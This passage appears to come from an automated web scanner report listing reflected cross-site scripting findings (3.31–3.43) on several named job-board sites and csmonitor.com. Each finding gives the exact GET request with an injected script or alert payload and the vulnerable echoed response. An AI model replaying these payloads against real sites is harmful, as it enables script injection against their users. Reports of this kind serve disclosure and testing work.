HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:27 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ed21alnsfs6f26cfhvjk1jc6s7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:27 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120988

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.computeraideddesigncrossing.com/?1752d"><script>alert(1)</script>11735ab5ac7=1">
...[SNIP]...

3.31. http://www.constructioncrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constructioncrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac657"><script>alert(1)</script>1735ed5792f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ac657"><script>alert(1)</script>1735ed5792f=1 HTTP/1.1
Host: www.constructioncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:33 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0glasi0furb49t09sf8usk8131; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 131646

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.constructioncrossing.com/?ac657"><script>alert(1)</script>1735ed5792f=1">
...[SNIP]...

3.32. http://www.consultingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.consultingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd97c"><script>alert(1)</script>8601e5cd1fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fd97c"><script>alert(1)</script>8601e5cd1fd=1 HTTP/1.1
Host: www.consultingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:33 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=iko9vh37jo3le1bfsfh85lnv64; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112168

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.consultingcrossing.com/?fd97c"><script>alert(1)</script>8601e5cd1fd=1">
...[SNIP]...

3.33. http://www.contractmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.contractmanagementcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d62a6"><script>alert(1)</script>6f6a8319c16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d62a6"><script>alert(1)</script>6f6a8319c16=1 HTTP/1.1
Host: www.contractmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=10pkrahhva0p5pupcvs1ma41n4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111842

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.contractmanagementcrossing.com/?d62a6"><script>alert(1)</script>6f6a8319c16=1">
...[SNIP]...

3.34. http://www.counselingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.counselingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 662a5"><script>alert(1)</script>9af98f88fd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?662a5"><script>alert(1)</script>9af98f88fd9=1 HTTP/1.1
Host: www.counselingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=f5kspj2g81754pnc3vhgter554; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149376

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.counselingcrossing.com/?662a5"><script>alert(1)</script>9af98f88fd9=1">
...[SNIP]...

3.35. http://www.cpluspluscrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cpluspluscrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84068"><script>alert(1)</script>76cfc652e34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?84068"><script>alert(1)</script>76cfc652e34=1 HTTP/1.1
Host: www.cpluspluscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:58 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gj2r0hmde0qmmm07o2jddtilj0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:58 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114876

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.cpluspluscrossing.com/?84068"><script>alert(1)</script>76cfc652e34=1">
...[SNIP]...

3.36. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fb27"-alert(1)-"1739995f90e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA2fb27"-alert(1)-"1739995f90e/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:11 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Sat, 22 Jan 2011 22:25:11 GMT
Date: Fri, 21 Jan 2011 22:25:11 GMT
Content-Length: 22031
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA2fb27"-alert(1)-"1739995f90e/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.37. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ab91"-alert(1)-"1faa5b06e1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/20101ab91"-alert(1)-"1faa5b06e1f/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:19 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86392
Expires: Sat, 22 Jan 2011 22:25:11 GMT
Date: Fri, 21 Jan 2011 22:25:19 GMT
Content-Length: 22031
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/20101ab91"-alert(1)-"1faa5b06e1f/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.38. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e99ca"-alert(1)-"45e4a32e5f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/2010/1228e99ca"-alert(1)-"45e4a32e5f7/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:31 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86355
Expires: Sat, 22 Jan 2011 22:24:46 GMT
Date: Fri, 21 Jan 2011 22:25:31 GMT
Content-Length: 22031
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/2010/1228e99ca"-alert(1)-"45e4a32e5f7/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.39. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37c15"-alert(1)-"4ca3ca944b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal37c15"-alert(1)-"4ca3ca944b5 HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:54 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Sat, 22 Jan 2011 22:25:54 GMT
Date: Fri, 21 Jan 2011 22:25:54 GMT
Content-Length: 22031
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal37c15"-alert(1)-"4ca3ca944b5";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.40. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d082"-alert(1)-"de38b5e98a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA1d082"-alert(1)-"de38b5e98a6/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:14 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86399
Expires: Sat, 22 Jan 2011 22:25:13 GMT
Date: Fri, 21 Jan 2011 22:25:14 GMT
Content-Length: 22093
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA1d082"-alert(1)-"de38b5e98a6/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.41. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd583"-alert(1)-"06ddd227669 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Politicscd583"-alert(1)-"06ddd227669/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:23 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86374
Expires: Sat, 22 Jan 2011 22:24:57 GMT
Date: Fri, 21 Jan 2011 22:25:23 GMT
Content-Length: 22093
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Politicscd583"-alert(1)-"06ddd227669/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.42. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54f7f"-alert(1)-"984baab725b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Politics/monitor_breakfast54f7f"-alert(1)-"984baab725b/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:37 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Sat, 22 Jan 2011 22:25:38 GMT
Date: Fri, 21 Jan 2011 22:25:38 GMT
Content-Length: 22093
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Politics/monitor_breakfast54f7f"-alert(1)-"984baab725b/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.43. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ac7e"-alert(1)-"619fa0f46a4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Politics/monitor_breakfast/20111ac7e"-alert(1)-"619fa0f46a4/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:52 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86378
Expires: Sat, 22 Jan 2011 22:25:31 GMT
Date: Fri, 21 Jan 2011 22:25:53 GMT
Content-Length: 22093
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Politics/monitor_breakfast/20111ac7e"-alert(1)-"619fa0f46a4/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
